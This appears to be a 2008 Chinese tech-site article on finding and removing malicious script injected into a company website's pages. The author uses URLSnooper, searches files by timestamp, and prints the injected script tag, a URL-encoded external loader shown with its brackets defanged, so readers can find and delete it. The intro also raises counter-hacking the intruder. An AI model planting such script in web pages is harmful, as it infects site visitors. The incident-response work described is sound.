您所在的位置:网络安全 > 安全观察 > 攻防实战:网络维护过程中的渗透与反渗透(1)

攻防实战:网络维护过程中的渗透与反渗透(1)

2008-10-30 09:40 陈小兵 51CTO.com 字号:T | T
一键收藏,随时查看,分享好友!

网络安全与维护是攻击与防护的对立统一,好的攻击就是好的防护,从挂马的计算机中中获取的痕迹,反过来渗透到入侵者的计算机,也不是不可能的事情。

AD:

【51CTO.com 独家特稿】我的一个朋友告诉我,说他们在访问自己公司网站时,出来一大堆东西,而且杀毒软件还提示网页存在病毒, 我的第一感觉就是公司服务器被人入侵了。

(一)网站挂马检测和清除

1.使用软件嗅探被挂马页面

朋友将远程终端和公司网站名称告诉我后,我首先在虚拟机中使用URLSnooper软件对网站进行嗅探,果然网站多处文件被人挂马,如图1所示。登陆远程终端后,一看其服务器配置较高,带宽是20M光纤,访问网络的速度非常快,觉得是高质量肉鸡的首选,也难怪被人黑。

 
图1 使用URLSnooper监听网站所有链接和访问

说明:

(1)URLSnooper是一款安全检查工具,就其名称意义就知道该软件是URL监视,个人感觉是一款捕捉网站是否挂马的好程序。URLSnooper安装比较简单,安装完毕后需要安装默认的抓包软件。

(2)确认网站被人挂马后,首先将网站文件进行了备份。

直接到网站根目录查看网站文件的最近的一些修改时间,从首页更改的时间为8月25日,因此可以借助系统的文件搜索功能搜索2008年8月24日至8月26日之间的文件,如图2所示,搜索出来好几十个文件,被修改文件很有特点,index.html、index.asp、conn.asp、top.asp、foot.asp以及js文件均被修改,从文件中可以看出该挂马人绝对是一个团伙或者是一个老手,他不是对所有文件进行挂马,而是有针对性的对一个关键文件进行挂马。

 
图2 查找被修改的网站文件

2.清除挂马代码

在所有文件中查找代码

[script src=http://%61%76%65%31%2E%63%6E][/script]
【注:已用“[]”替换“<>”】
将其清除。



分享到:

  1. RSA 2018:值得关注的9个安全趋势你知道吗?
  2. XSS的另一种利用思路

热点职位

更多>>

热点专题

更多>>

读书

软件设计师考试全真模拟试题及解析
本书是按照全国计算机技术与软件专业技术资格(水平)考试《软件设计师考试大纲》的要求,参照《软件设计师教程》及近年来考试试

51CTO旗下网站

领先的IT技术网站 51CTO 领先的中文存储媒体 WatchStor 中国首个CIO网站 CIOage 中国首家数字医疗网站 HC3i 51CTO学院